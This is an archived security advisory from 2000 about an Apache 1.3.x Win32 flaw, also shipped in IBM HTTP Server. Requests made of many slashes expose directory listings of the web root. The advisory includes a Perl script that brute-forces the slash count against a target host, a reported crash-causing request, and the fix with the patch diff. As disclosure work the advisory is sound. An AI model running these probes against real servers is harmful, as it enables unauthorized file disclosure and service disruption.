4th Jun 2000 [SBWID-2678]
COMMAND
httpd
SYSTEMS AFFECTED
IBM HTTP SERVER / APACHE
PROBLEM
Marek Roy found following. There is a crucial number of "/"
(forward slash) you can use to retrieve the contents of the root
directory of this particular Web Server. Using this
vulnerability, you can retrieve any files or scripts running from
that directory and sub-directories.
The number of "/" used to reproduce this can be different from one
server to another. You can get a trial copy at:
http://www-4.ibm.com/software/webservers/httpservers/download.html#v136
Vulnerable:
Server: IBM_HTTP_Server/1.3.6.2 Apache/1.3.7-dev (Win32)
If you send a GET request of 210 "/", you get the actual Web Page.
If you send a GET request of 211 "/", you get Index of /. If you
send a GET request of 212 "/", you get:
Forbidden
You don't have permission to access
"/" x 212 on this server.
Luke Harless verified the bug using the perl program with Apache
1.3.12 (Win32) binary on Win98 downloaded from apache.org. It
always takes 235 / to work for him.
Sample scan script to find / offset:
#!/usr/bin/perl
use LWP::Simple;
use strict;
my $host = shift() || die "usage: $ARGV[0] [hostname]";
my $cnt;
my $data;
my $odata;
my $;
$odata = get("http://$host/");
if ($odata eq "")
{
die "no response from server: $host\n";
}
for ($i = 2; $i < 4096; $i++)
{
print "Trying $i...\n";
$data = get("http://$host" . ("/" x $i));
if ($data ne $odata)
{
print "/ = $i\n\n$data\n\n";
exit;
}
}
H D Moore added following. After he tried:
GET /DIR/%2e%2f%2e%2e%2e HTTP/1.0
And the server simple crashed, burned, and stopped accepting
connections. Whether the DoS was triggered by the earlier request
containing the null character or the single %2e%2f sequence is
unknown.
Marc Slemko added following. There is a bug in Apache 1.3.x on
the Win32 platform. This does NOT impact Apache running on Unix.
This is NOT particular to IBM's product, but is a bug in the
Apache HTTP server included in IBM's bundle. This bug allows
people to get a directory listing of a directory, if it is
enabled in the config, even if an index file is present that
would normally be displayed instead. While normally this is of
little consequence, in some situations this can be problematic.
What is happening is that when Apache calls stat() to check if the
index.html (or whatever name it has) exists, Windows will return
an error if the path is too long. Apache incorrectly treated this
as if the file does not exist. The included patch has been
applied to the Apache CVS tree and corrects this issue by
correcting an existing pathname length check. Different numbers
of '/'s are required based on the length of the path to the
DocumentRoot.
This is just speculation, but my guess as to why there is an exact
number of '/'s necessary is that if the stat() of ".htaccess"
fails in an unexpected way, then the request will be refused.
"index.html" is only one character longer, hence the one character
window between the stat() of "index.html" failing and the stat()
of ".htaccess" failing.
SOLUTION
Not Vulnerable:
Server: IBM_HTTP_Server/1.3.6.2 Apache/1.3.7-dev (Unix)
Obviously, a temporary workaround is to disable the Indexes option
(see the docs for the "Option" directive for details).
There is a rough plan to release a 1.3.13 version of Apache
sometime soon, with various changes including this security fix,
however this is subject to change. The patch applied to the
Apache CVS tree, as shown at
http://www.apache.org/websrc/cvsweb.cgi/apache-1.3/src/os/win32/util_win32.c.diff?r1=1.33&r2=1.34
follows:
RCS file: /home/cvs/apache-1.3/src/os/win32/util_win32.c,v
retrieving revision 1.33
retrieving revision 1.34
diff -u -r1.33 -r1.34
--- apache-1.3/src/os/win32/util_win32.c 1999/02/18 11:07:14 1.33
+++ apache-1.3/src/os/win32/util_win32.c 2000/06/02 16:30:27 1.34
@@ -580,7 +580,7 @@
};
/* Test 1 */
- if (strlen(file) > MAX_PATH) {
+ if (strlen(file) >= MAX_PATH) {
/* Path too long for Windows. Note that this test is not valid
* if the path starts with //?/ or \\?\. */
return 0;